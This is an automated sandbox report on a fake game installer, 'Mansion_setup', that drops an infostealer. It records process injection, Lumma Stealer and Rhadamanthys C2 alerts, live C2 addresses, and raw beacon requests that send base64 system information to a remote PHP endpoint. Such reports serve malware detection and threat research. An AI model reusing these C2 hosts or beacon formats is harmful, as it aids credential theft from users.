Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Mansion_setup (1).exe

Overview

General Information

Sample name:Mansion_setup (1).exe
Analysis ID:1615829
MD5:b51a099db70fbe7d19e9ff67e628fd41
SHA1:f46b9367619d335451d6c5b747101e116a2d29d2
SHA256:36be5a492b06835015566ffd1217a94ba86a274dd98e3a648848f1143619ca23
Tags:AtlasCareHomesLimitedexeuser-SquiblydooBlog
Infos:

Detection

Score:80
Range:0 - 100
Confidence:100%

Compliance

Score:48
Range:0 - 100

Signatures

Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Drops large PE files
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Drops PE files
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Dllhost Internet Connection
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Mansion_setup (1).exe (PID: 3180 cmdline: "C:\Users\user\Desktop\Mansion_setup (1).exe" MD5: B51A099DB70FBE7D19E9FF67E628FD41)
    • Mansion.exe (PID: 3824 cmdline: C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe MD5: 92FD2FE1716B9F3E45B6AE30FFF45D8B)
      • Mansion.exe (PID: 3896 cmdline: "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 92FD2FE1716B9F3E45B6AE30FFF45D8B)
      • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • MSBuild.exe (PID: 6176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • WerFault.exe (PID: 4208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 344 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • svchost.exe (PID: 4908 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • svchost.exe (PID: 3696 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • chrome.exe (PID: 3024 cmdline: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrE697.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/bd5c97e1" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • chrome.exe (PID: 5996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2096,i,7666385675108331514,3856656827583616406,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • msedge.exe (PID: 5528 cmdline: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrEBD8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/0da50779" MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 2404 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=1980,i,2109797830624315799,4341307213657690466,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • wmlaunch.exe (PID: 7072 cmdline: "C:\Program Files\Windows Media Player\wmlaunch.exe" MD5: 836F3636C231980EAD81C84BCA55D82B)
            • dllhost.exe (PID: 1152 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • Mansion.exe (PID: 6680 cmdline: "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 92FD2FE1716B9F3E45B6AE30FFF45D8B)
      • Mansion.exe (PID: 3268 cmdline: "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --app-path="C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1 MD5: 92FD2FE1716B9F3E45B6AE30FFF45D8B)
      • ExtractJPEGcmd.exe (PID: 4308 cmdline: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe MD5: 98FD0CECF45A8DC755F232E073B509E7)
      • qtZint.exe (PID: 6804 cmdline: C:\games\DDR5_NetCache\qtZint.exe MD5: 1944E1DC273E06252EAE4971DEBC0D91)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 45.91.193.85, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 1152, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49424
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4056, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4908, ProcessName: svchost.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, ParentCommandLine: "C:\Users\user\Desktop\Mansion_setup (1).exe", ParentImage: C:\Users\user\Desktop\Mansion_setup (1).exe, ParentProcessId: 3180, ParentProcessName: Mansion_setup (1).exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, ProcessId: 3824, ProcessName: Mansion.exe
Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4056, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4908, ProcessName: svchost.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-15T15:12:23.753196+010020599071Domain Observed Used for C2 Detected192.168.2.7498381.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-15T15:12:23.778818+010020599111Domain Observed Used for C2 Detected192.168.2.7525891.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-15T15:12:23.764314+010020599151Domain Observed Used for C2 Detected192.168.2.7620621.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-15T15:12:23.673227+010020599191Domain Observed Used for C2 Detected192.168.2.7615591.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-15T15:12:23.704040+010020599211Domain Observed Used for C2 Detected192.168.2.7541341.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-15T15:12:23.740271+010020599271Domain Observed Used for C2 Detected192.168.2.7620921.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-15T15:12:23.714613+010020599311Domain Observed Used for C2 Detected192.168.2.7603131.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-15T15:12:23.689719+010020599331Domain Observed Used for C2 Detected192.168.2.7645231.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-15T15:13:00.348988+010028548242Potentially Bad Traffic45.91.193.851308192.168.2.749422TCP
2025-02-15T15:13:09.159523+010028548242Potentially Bad Traffic45.91.193.851308192.168.2.749423TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-15T15:11:13.659837+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749444TCP
2025-02-15T15:12:42.538467+010028548021Domain Observed Used for C2 Detected45.91.193.851308192.168.2.749408TCP
2025-02-15T15:13:00.348988+010028548021Domain Observed Used for C2 Detected45.91.193.851308192.168.2.749422TCP
2025-02-15T15:13:09.159523+010028548021Domain Observed Used for C2 Detected45.91.193.851308192.168.2.749423TCP
2025-02-15T15:13:15.396583+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749424TCP
2025-02-15T15:13:21.981827+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749425TCP
2025-02-15T15:13:28.588099+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749426TCP
2025-02-15T15:13:35.176367+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749427TCP
2025-02-15T15:13:41.748771+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749428TCP
2025-02-15T15:13:48.647380+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749429TCP
2025-02-15T15:13:54.929001+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749430TCP
2025-02-15T15:14:01.521885+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749431TCP
2025-02-15T15:14:08.120183+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749432TCP
2025-02-15T15:14:14.708313+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749433TCP
2025-02-15T15:14:21.352706+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749434TCP
2025-02-15T15:14:27.901537+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749435TCP
2025-02-15T15:14:34.540723+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749436TCP
2025-02-15T15:14:41.227985+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749437TCP
2025-02-15T15:14:47.692291+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749438TCP
2025-02-15T15:14:54.280426+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749439TCP
2025-02-15T15:15:00.965894+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749440TCP
2025-02-15T15:15:07.575131+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749441TCP
2025-02-15T15:15:14.178153+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749442TCP
2025-02-15T15:15:20.791252+010028548021Domain Observed Used for C2 Detected45.91.193.85443192.168.2.749443TCP

Click to jump to signature section

Show All Signature Results

Compliance

barindex
Source: Mansion_setup (1).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\LICENSE.electron.txtJump to behavior
Source: Mansion_setup (1).exeStatic PE information: certificate valid
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49424 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49425 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49426 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49427 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49428 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49429 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49430 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49431 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49432 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49433 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49434 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49435 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49436 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49437 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49438 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49439 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49440 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49441 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49442 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49443 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49444 version: TLS 1.2
Source: Mansion_setup (1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\resourcesJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\user\Desktop\Mansion_setup (1).exeJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\app-64.7zJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\localesJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2059931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (torpdidebar .com) : 192.168.2.7:60313 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059915 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (garulouscuto .com) : 192.168.2.7:62062 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059911 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (breedertremnd .com) : 192.168.2.7:52589 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059907 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (actiothreaz .com) : 192.168.2.7:49838 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.7:62092 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059933 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (voicesharped .com) : 192.168.2.7:64523 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inputrreparnt .com) : 192.168.2.7:54134 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:1308 -> 192.168.2.7:49408
Source: Network trafficSuricata IDS: 2059919 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (importenptoc .com) : 192.168.2.7:61559 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:1308 -> 192.168.2.7:49422
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:1308 -> 192.168.2.7:49423
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49424
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49426
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49425
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49432
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49429
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49433
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49440
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49431
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49428
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49439
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49435
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49427
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49434
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49436
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49437
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49443
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49438
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49442
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49430
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49441
Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49444
Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.91.193.85 1308
Source: global trafficTCP traffic: 45.91.193.85 ports 0,1,3,443,8,1308
Source: global trafficTCP traffic: 192.168.2.7:49408 -> 45.91.193.85:1308
Source: global trafficTCP traffic: 192.168.2.7:49336 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 62.149.0.30 62.149.0.30
Source: Joe Sandbox ViewIP Address: 169.229.128.134 169.229.128.134
Source: Joe Sandbox ViewIP Address: 129.6.15.28 129.6.15.28
Source: Joe Sandbox ViewASN Name: HOSTCRAMHostCramLLCUS HOSTCRAMHostCramLLCUS
Source: Joe Sandbox ViewJA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.91.193.85:1308 -> 192.168.2.7:49422
Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.91.193.85:1308 -> 192.168.2.7:49423
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknownTCP traffic detected without corresponding DNS query: 95.216.224.46
Source: global trafficHTTP traffic detected: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQMDtATfnJO6JAXDQoHl8pAaJdhTQQU3QQJB6L1en1SUxKSle44gCUNplkCEG1SGHCH6CNNhWAA0ICPk1Y%3D HTTP/1.1Cache-Control: max-age = 86400Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 26 Sep 2024 16:44:07 GMTIf-None-Match: "59820a5ba49dee3594b50ae906ccedc5b81eb911"User-Agent: Microsoft-CryptoAPI/10.0Host: ocsps.ssl.com
Source: global trafficHTTP traffic detected: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQg3SSkKA74hABkhmlBtJTz8w3hlAQU%2BWC71OPVNPa49QaAJadz20ZpqJ4CEEJLalPOx2YUHCpjsaUcQQQ%3D HTTP/1.1Cache-Control: max-age = 86400Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 26 Sep 2024 16:44:14 GMTIf-None-Match: "3d5557f4d0ce85b5d42ae97579b154c53648c418"User-Agent: Microsoft-CryptoAPI/10.0Host: ocsps.ssl.com
Source: global trafficHTTP traffic detected: GET /ud83c7gi0/8pe93ha5y.php?get=c3RhcnQ%3D&name=8J%2BqliBNYW5zaW9uIGdhbWU%3D&info=V2luZG93cyAxMCwgNDcyODQ3LCAxMjgweDEwMjQ%3D HTTP/1.1host: 95.216.224.46connection: keep-aliveaccept: */*accept-language: *sec-fetch-mode: corsuser-agent: undiciaccept-encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /ud83c7gi0/8pe93ha5y.php?get=bGV0c2dv&name=8J%2BqliBNYW5zaW9uIGdhbWU%3D&info=V2luZG93cyAxMCwgNDcyODQ3LCAxMjgweDEwMjQ%3D HTTP/1.1host: 95.216.224.46connection: keep-aliveaccept: */*accept-language: *sec-fetch-mode: corsuser-agent: undiciaccept-encoding: gzip, deflate
